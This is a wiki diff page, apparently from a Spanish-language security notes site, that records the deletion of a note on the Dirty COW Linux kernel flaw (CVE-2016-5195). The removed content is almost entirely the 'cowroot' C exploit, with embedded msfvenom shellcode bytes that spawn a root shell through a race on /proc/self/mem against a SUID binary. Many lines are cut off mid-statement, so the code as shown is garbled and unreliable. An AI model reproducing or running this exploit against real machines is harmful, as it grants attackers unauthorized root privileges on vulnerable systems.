notas:seguridad:exploits:dirty_cow
notas:seguridad:exploits:dirty_cow [2016/11/03 20:12] – cayu | notas:seguridad:exploits:dirty_cow [Fecha desconocida] (actual) – borrado - editor externo (Fecha desconocida) 127.0.0.1 | ||
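--- a/notas:seguridad:exploits:dirty_cow
+++ b/notas:seguridad:exploits:dirty_cow
@@ -1,168 +0,0 @@
-====== Dirty COW ======
-**CVE-2016-5195** https://
-
-<code cpp>
-/*
-* (un)comment correct payload first (x86 or x64)!
-*
-* $ gcc cowroot.c -o cowroot -pthread
-* $ ./cowroot
-* DirtyCow root privilege escalation
-* Backing up /
-* Size of binary: 57048
-* Racing, this may take a while..
-* /
-* Popping root shell.
-* Don't forget to restore /tmp/bak
-* thread stopped
-* thread stopped
-* root@box:/
-* uid=0(root) gid=1000(foo) groups=1000(foo)
-*/
-
-#include <
-#include <
-#include <
-#include <
-#include <
-#include <
-#include <
-
-void *map;
-int f;
-int stop = 0;
-struct stat st;
-char *name;
-pthread_t pth1,
-
-// change if no permissions to read
-char suid_binary[] = "/
-
-/*
-* $ msfvenom -p linux/
-*/
-unsigned char sc[] = {
-0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
-0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
-0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
-0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
-0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
-0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
-};
-unsigned int sc_len = 177;
-
-/*
-* $ msfvenom -p linux/
-unsigned char sc[] = {
-0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
-0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
-0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
-0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
-0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
-0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
-0x89, 0xe1, 0xcd, 0x80
-};
-unsigned int sc_len = 136;
-*/
-
-void *madviseThread(void *arg)
-{
-char *str;
-str=(char*)arg;
-int i,c=0;
-for(i=0;
-c+=madvise(map,
-}
-printf("
-}
-
-void *procselfmemThread(void *arg)
-{
-char *str;
-str=(char*)arg;
-int f=open("/
-int i,c=0;
-for(i=0;
-lseek(f,
-c+=write(f, str, sc_len);
-}
-printf("
-}
-
-void *waitForWrite(void *arg) {
-char buf[sc_len];
-
-for(;;) {
-FILE *fp = fopen(suid_binary,
-
-fread(buf, sc_len, 1, fp);
-
-if(memcmp(buf,
-printf("
-break;
-}
-
-fclose(fp);
-sleep(1);
-}
-
-stop = 1;
-
-printf("
-printf("
-
-system(suid_binary);
-}
-
-int main(int argc,char *argv[]) {
-char *backup;
-
-printf("
-printf("
-
-asprintf(&
-system(backup);
-
-f = open(suid_binary,
-fstat(f,&
-
-printf("
-
-char payload[st.st_size];
-memset(payload,
-memcpy(payload,
-
-map = mmap(NULL,
-
-printf("
-
-pthread_create(&
-pthread_create(&
-pthread_create(&
-
-pthread_join(pth3,
-
-return 0;
-}
-</
-
-* https://
-
-* https://
-* http://
-
-* https://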
notas/seguridad/exploits/dirty_cow.1478203976.txt.gz · Última modificación: 2016/11/03 20:12 por cayu